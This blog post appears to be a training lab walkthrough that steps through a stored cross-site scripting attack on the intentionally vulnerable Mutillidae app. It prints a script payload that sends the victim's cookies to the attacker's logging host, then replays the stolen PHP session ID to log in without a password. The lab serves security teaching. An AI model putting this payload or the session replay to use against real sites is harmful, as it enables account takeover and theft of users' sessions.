Powered by Blogger.
Home » » OWASP Top 10 Web Hacking Final Lab 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

OWASP Top 10 Web Hacking Final Lab 15 - Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2

Written By Akademy on Thursday, November 21, 2013 | 9:27 PM

{ Man-in-the-Middle, Persistent Covert Cross Site Scripting Injection #2 }

Login to Win-XP hoặc Win7 (Victim Machine)

  1. Edit Virtual Machine Settings
    • Instructions:
      1. Click on Damn Vulnerable WXP-SP2
      2. Edit Virtual Machine Settings
    • Note(FYI):
      1. This third Virtual Machine does not have to be Windows XP.  I just need to be another Virtual Machine to demonstrate how the cookie will be sent covertly with the victim knowing.
  2. Set Network Adapter
    • Instructions:
      1. Click on Network Adapter
      2. Click on the radio button "Bridged: Connected directly to the physical network".
  3. Start Up Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Start Up your VMware Player
      2. Play virtual machine
  4. Logging into Damn Vulnerable WXP-SP2.
    • Instructions:
      1. Username: administrator
      2. Password: <Provide the Password>
  5. Open a Command Prompt
    • Instructions:
      1. Start --> All Programs --> Accessories --> Command Prompt
  6. Obtain the IP Address
    • Instructions:
      1. In the Command Prompt type "ipconfig"
    • Note(FYI):
      • In my case, Damn Vulnerable WXP-SP2's IP Address 192.168.1.116.
      • This is the IP Address of the Victim Machine.
      • Record your IP Address.

Section 8. Start Apache Webserver
  1. Start Apache2 (On BackTrack5R1)
    • Instructions:
      1. service apache2 start
      2. service apache2 status
      3. ps -eaf | grep apache2 | grep -v grep
    • Note(FYI):
      1. Start up the apache2 webserver.
      2. Display the status of the apache2 webserver.
      3. See the processes of the apache2 webserver.
Section 9. Verify Cookie Script Exists
  1. Verify Cookie Script Exists (On BackTrack5R1)
    • Instructions:
      1. ls -l /usr/lib/cgi-bin/logit.pl
      2. cat /dev/null > /var/www/logdir/log.txt
      3. ls -l /var/www/logdir/log.txt
    • Note(FYI):
      1. List the logit.pl script.  If this script is not present, then complete the pre-requisite lab.
      2. Clear the log.txt havest0r file.
      3. Notice the log.txt is now a Zero Byte File.

Section 10. Open Mutillidae
  1. Open Firefox (On BackTrack5R1)
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
  2. Open Mutillidae
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
  3. Reset Database
    • Instructions:
      1. Click the Reset DB Link
    • Notes (FYI):
      • This link will remove the XSS Injection from the database.
  4. Proceed with Database Reset
    • Instructions:
      1. Click the OK Button
Section 11. Persistent Covert Cross Site Script(XSS)
  1. Add to your blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting(XSS) --> Persistent(Second Order) --> Add to your blog
  2. Inspect Element
    • Instructions:
      1. Right Click in the Comment Box
      2. Click Inspect Element
    • Note(FYI):
      1. This is not a necessary step for the injection.  The goal is to allow the injection attempt to remain on the same line instead of being word-wrapped.
  3. Change Text Area Column Length
    • Instructions:
      1. Change 65 to 95
      2. Click Close Button (See Picture)
  4. Covert Cookie Harvest0r Cross Site Script (XSS) Injection
    • Note(FYI):
      1. Replace 192.168.1.112 with your BackTrack IP Address obtained in (Section 6, Step 2).
      2. This JavaScript tells the web browser to send the cookies back to the CGI Cookie Script on the BackTrack Machine.
    • Instructions:
      1. Place the below text in the comment box.
        • <script> new Image().src="http://192.168.1.112/cgi-bin/logit.pl?"+document.cookie; </script>
      2. Click the Save Blog Entry
  5. View Cookie Harvest0r Cross Site Script (XSS) Results
    • Note(FYI):
      1. Notice nothing is displayed under the comment cell.
      2. Or are your eyes deceiving you?
  6. View the Havest0r Log
    • Instructions:
      1. cat /var/www/logdir/log.txt
    • Notes (FYI):
      1. Although the Blog displayed nothing back to us, it was covertly recorded in our Havest0r log.
        • How do you like them apples?

Section 12. Login to Mutillidae
  1. Start up Internet Explo[d]er (On Damn Vulnerable WXP-SP2)
    • Instructions:
      1. Start --> All Programs --> Internet Explorer
  2. Open the Mutillidae Application
    • Notes (FYI):
      1. Replace 192.168.1.111 in the following URL --> http://192.168.1.111/mutillidae, with your Mutillidae's IP Address obtained from (Section 3, Step 3)
    • Instructions:
      1. Place the following URL in the Address Bar
        • http://192.168.1.111/mutillidae/
      2. Click Login/Register
  3. Login
    • Instructions:
      1. Name: samurai
      2. Password: samurai
      3. Click the Login Button
    • Notes(FYI):
      1. We are logging on to Mutillidae to simulate a user logging on to a real application and being granted a Session ID.
  4. View someone's blog
    • Instructions:
      1. OWASP Top 10 --> A2 - Cross Site Scripting (XSS) --> Persistent (Second Order) --> View someones's blog
  5. Show All Blog Entries
    • Instructions:
      1. Select Show All from the down drop menu
      2. View Blog Entries
  6. View Blog Entries
    • Note(FYI):
      1. Notice nothing is displayed under the comment cell.
      2. Is this Deja Vu?

Section 13. View Havest0r Log
  1. View the Havest0r Log (On BackTrack5R1)
    • Instructions:
      1. cat /var/www/logdir/log.txt
    • Notes (FYI):
      1. Notice the cookie now shows the username samurai.
      2. Notice the cookie now shows the PHP Session ID, which is pretty much equivalent to a password.

Section 14. Simulate Man-In-The-Middle Attack
  1. On BackTrack, Open Firefox (On BackTrack5R1)
    • Instructions:
      1. Click on the Firefox Icon
    • Notes (FYI):
      • If FireFox Icon does not exist in the Menu Bar Tray, then go to Applications --> Internet --> Firefox Web Browser
     
  2. Start Cookies Manager+
    • Instructions:
      1. Tools --> Cookies Manager+
    • Notes (FYI):
      • Click here to install Cookie Manager+ you have not already done so.
  3. Add Cookie Entry
    • Instructions:
      1. Click the Add Button
  4. Add PHPSESSID Cookie Entry
    • Note(FYI):
      1. Replace jri8sj5cnl6ironsqtnbpo9e21 with your PHPSESSID found in crack_cookies.txt (See Below Picture).
      2. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: PHPSESSID
      2. Content: jri8sj5cnl6ironsqtnbpo9e21
      3. Host: 192.168.1.111
      4. Path: /
      5. Click the Save Button.
  5. Add Cookie Entry
    • Instructions:
      1. Click the Add Button
  6. Add showhints Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: showhints
      2. Content: 0
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button
  7. Add Cookie Entry
    • Instructions:
      1. Click the Add Button
  8. Add username Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: username
      2. Content: samurai
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button
  9. Add Cookie Entry
    • Instructions:
      1. Click the Add Button
  10. Add uid Cookie Entry
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
    • Instructions:
      1. Name: uid
      2. Content: 6
      3. Host: 192.168.1.111
      4. Path: /mutillidae/
      5. Click the Save Button
      6. Click the Close Button
  11. Implement Man-in-the-Middle Attack
    • Note(FYI):
      1. Replace 192.168.1.111 with Mutillidae's IP Address Host IP Address obtained from (Section 3, Step 3).
      2. Notice you will be automagically logged in without a password.  For this reason, it is extremely important that session information is (1) not only encrypted, (2) but also users logout after they finish their session.
    • Instructions:
      1. http://192.168.1.111/mutillidae/
      2. Notice that user samurai logged in without a password.

Section 15. Proof of Lab
  1. On BackTrack, Start up a terminal window (On BackTrack5R1)
    • Instructions:
      1. Click on the Terminal Window
     
  2. Proof of Lab Các bạn hãy quay lại toàn bộ tiến trình thực hành và text note có tên của mình
Share this article :

0 comments:

 
Trung Tâm Đào Tạo An Toàn Thông Tin Học Hacker Mũ Xám Online | Học An Ninh Mạng Trực Tuyến | CEH VIỆT NAM
Copyright © 2013. HACKER MŨ XÁM - All Rights Reserved
Web Master @ Võ Sĩ Máy Tính
Contact @ Đông Dương ICT